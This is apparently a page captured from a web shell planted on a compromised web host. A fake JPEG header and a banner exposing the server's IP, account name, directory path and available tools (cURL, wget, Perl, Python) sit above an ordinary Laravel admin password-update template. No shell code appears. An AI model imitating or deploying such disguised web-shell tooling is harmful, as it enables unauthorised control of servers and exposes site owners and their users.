����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.222.251.131 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/././bofirmacademy.com/resources/views/admin/profile/ |
Upload File : |
@extends('layouts.admin') @section('content') <!-- Page content area start --> <div class="page-content"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="breadcrumb__content"> <div class="breadcrumb__content__left"> <div class="breadcrumb__title"> <h2>{{ __('Update Password') }}</h2> </div> </div> <div class="breadcrumb__content__right"> <nav aria-label="breadcrumb"> <ul class="breadcrumb"> <li class="breadcrumb-item"><a href="{{route('admin.dashboard')}}">{{__('Dashboard')}}</a></li> <li class="breadcrumb-item active" aria-current="page">{{ __('Update Password') }}</li> </ul> </nav> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="customers__area bg-style mb-30"> <div class="item-title d-flex justify-content-between"> <h2>{{ __('Update Password') }}</h2> </div> <form action="{{route('admin.change-password')}}" method="post" class="form-horizontal" > @csrf <div class="row"> <div class="col-md-12"> <div class="row"> <div class="col-md-6"> <div class="input__group mb-25"> <label for="password">{{ __('New Password') }} <span class="text-danger">*</span></label> <input type="password" name="password" id="password" value="" placeholder="{{ __('Type your new password') }}" class="form-control" required> @if ($errors->has('password')) <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{ $errors->first('password') }}</span> @endif </div> </div> <div class="col-md-6"> <div class="input__group mb-25"> <label for="password_confirmation">{{ __('Confirm Password') }} <span class="text-danger">*</span></label> <input type="password" name="password_confirmation" id="password_confirmation" value="" placeholder="{{ __('Type your confirm password') }}" class="form-control" required> @if ($errors->has('password_confirmation')) <span class="text-danger"><i class="fas fa-exclamation-triangle"></i> {{ $errors->first('password_confirmation') }}</span> @endif </div> </div> </div> </div> </div> <div class="row mb-3 text-end"> <div class="col-md-12"> @updateButton </div> </div> </form> </div> </div> </div> </div> </div> <!-- Page content area end --> @endsection